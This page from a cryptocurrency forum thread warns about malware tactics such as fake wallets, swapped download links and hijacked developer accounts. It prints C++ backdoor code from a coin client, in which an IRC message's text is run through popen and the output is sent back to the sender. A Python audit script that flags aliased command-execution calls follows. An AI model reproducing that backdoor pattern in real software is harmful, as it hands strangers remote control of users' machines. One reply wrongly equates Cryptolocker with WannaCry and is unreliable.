
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 8. (Read 834755 times)

newbie
Activity: 41
Merit: 0
These con artists are always picking up, getting to be more intelligent and more complex. Be cautious dependably. Download just from official locales and dependably check where the connection will take you.
newbie
Activity: 7
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Malwares or spywares are the most common problems, make sure that you are using encrypted protections on your device.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
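
Added example (not part of the original post or of the coin's source): a review-time triage script for an untrusted source tree that resolves single-identifier `#define` aliases and reports calls that end up at command-execution functions, which is how `CRead` concealed `popen` in the snippet above. The `#define` lines, the file names and the `DANGEROUS` list are assumptions; the post shows only the obfuscated and resolved call sites.

```python
import re

# Functions that run a command or spawn a process (starting list, not exhaustive).
DANGEROUS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
             "WinExec", "ShellExecuteA", "ShellExecuteW", "CreateProcessA", "CreateProcessW"}

# Object-like macro whose whole body is one identifier, e.g. "#define CRead popen".
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)\s+([A-Za-z_]\w*)\s*$")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")

def collect_aliases(sources):
    """Return {macro_name: target} for every alias macro in {path: text}."""
    aliases = {}
    for text in sources.values():
        for line in text.splitlines():
            m = DEFINE_RE.match(line)
            if m:
                aliases[m.group(1)] = m.group(2)
    return aliases

def resolve(name, aliases):
    """Follow alias chains (A -> B -> popen), stopping on cycles."""
    seen = set()
    while name in aliases and name not in seen:
        seen.add(name)
        name = aliases[name]
    return name

def audit(sources):
    """Return [(path, line_no, name_as_written, resolved_name)] for risky calls."""
    aliases = collect_aliases(sources)
    findings = []
    for path, text in sources.items():
        for no, line in enumerate(text.splitlines(), 1):
            for m in CALL_RE.finditer(line):
                real = resolve(m.group(1), aliases)
                if real in DANGEROUS:
                    findings.append((path, no, m.group(1), real))
    return findings

# Constructed sample: macro definitions are assumed; the CRead line is copied from the post.
SAMPLE = {
    "util.h": "#define CLine FILE\n#define CRead popen\n#define CFree pclose\n",
    "irc.cpp": 'if (vWords[1] == CBuff && vWords[3] == ":!")\n{\n'
               '    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");\n}\n',
}

if __name__ == "__main__":
    print(audit(SAMPLE))
```

This is a line-based heuristic: it does not handle function-like macros, multi-line definitions or names built with token pasting, so a clean result only narrows where to read by hand.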
newbie
Activity: 98
Merit: 0
One of the best ways to prevent malware infecting your devices is to have a machine dedicated for crypto mining/trading. This will allow you to separate your normal activities on the internet and your cryptocurrency related activities. This reduces the chance of malware infecting your machine and hackers stealing personal data.

To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
newbie
Activity: 113
Merit: 0
This is one of the most terrifying things. I am super careful but they are getting stronger each day.
jr. member
Activity: 70
Merit: 1
Count Your Investment - Not your savings
I'm a newbie here, thank you for your advice. I hope all newbies can read this, and for those people who just click without even reading what the pop-up's real intention is, maybe some pop-ups are just full of viruses that can corrupt their files. Be safe everyone and be cautious. Thank you.
full member
Activity: 306
Merit: 102
Just another random pre satoshi crypto freak
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as bait for hacking and phishing. Please avoid any airdrop that gives a direct link to your MEW or other wallet account. You may end up on a scam wallet site.
newbie
Activity: 37
Merit: 0
This is terrifying... Individuals who have the ability and aptitudes utilize them in the most unsuitable way. On the off chance that lone they utilize it to improve things or help other individuals, the world would be lovely. I figure that is the thing that truly life is. A debt of gratitude is in order for this data. Expectation everybody will know about this.
newbie
Activity: 342
Merit: 0
There is always malware everywhere, this is digital life. There are also hardware vulnerabilities in all our processors, as was recently revealed. I forgot the name, but basically anyone can be hacked.
newbie
Activity: 109
Merit: 0
Ever since the computer was invented, viruses were also born at that time. Now sophisticated malware infections are increasingly affecting the software on our computers; to minimize them we must put antivirus on our computer systems.
sr. member
Activity: 811
Merit: 250
Thank you, very helpful. I will be more alert to old threads that have been updated by irresponsible parties, who will use various ways to rob.
member
Activity: 289
Merit: 10

Excellent theme, it will be useful to all this relevant information at the moment so thank you I will be in the best way on the Internet!
newbie
Activity: 50
Merit: 0
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Yes, so true! This thread will surely help, especially newbies like me. Please always bear in mind that before investing in any crypto, make sure to read everything, including reviews and their white paper, in order to avoid scams!
newbie
Activity: 102
Merit: 0
This is becoming an increasing threat. Just over a few days ago, a colleague also fell for the "new wallet" strategy. Luckily for her, we saved the day before more damage was done to her PC. This malware steals information and all that. These are trying times.
newbie
Activity: 30
Merit: 0
Much obliged to you for the Information! I am new to this gathering and still need to take in a great deal.

I had an issue with a mark, I tapped on somebody's and got to some bizarre site. I trust my antivirus blocked everything, except I don't know.
member
Activity: 406
Merit: 10
keyTango
Thanks for this, it's a big help. I have a friend who got hacked and he doesn't know how he was hacked, so I just want to know: is there any chance to prevent this, like antivirus? What antivirus would you recommend to prevent this kind of malware? Thanks, it's a big help.
This case makes you think. This is terrible and very dangerous for the owners of crypto-currencies. I advise you to use the ESET NOD 32 antivirus. A very convenient interface and a constantly updated virus database. With it there will be no problems. I really like it, I have used it for several years.
newbie
Activity: 13
Merit: 0
Some wallets/links have been detected by my antivirus often these days, so I auto-update my antivirus and do not proceed to malicious sites or download apps from external sources. It's better to be safe than sorry!
newbie
Activity: 53
Merit: 0
I download some wallets, and sometimes the wallet triggers an alert from my antivirus. The core dev says it's just a false alarm; is that true? Malware is really hard to remove, that's why I was scared that my laptop/PC got malware.
member
Activity: 257
Merit: 10
Thanks for this, it's a big help. I have a friend who got hacked and he doesn't know how he was hacked, so I just want to know: is there any chance to prevent this, like antivirus? What antivirus would you recommend to prevent this kind of malware? Thanks, it's a big help.
newbie
Activity: 98
Merit: 0
I think it's a very terrible incident for us. Malware is one of the most useless viruses. It generally killed our phone and hacked all our privacy by a group. Actually, we work hard for our own development but this group hacked this within minutes like a vampire's eating. This work is done by some indolent people who are interested in earning money dishonestly. For all these things, everyone should be aware of sophisticated malware infection attempts.
member
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
Anyone of you encountered the ransom cryptolocker? Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Cryptolocker, also known as WannaCry, is malware that spreads like a worm that duplicates itself across the network of your computer, meaning all computers connected to your network are in great danger. Why are you running a virtual machine to mine or to store wallets in crypto? It's a bad idea to use a VM to run that kind of stuff.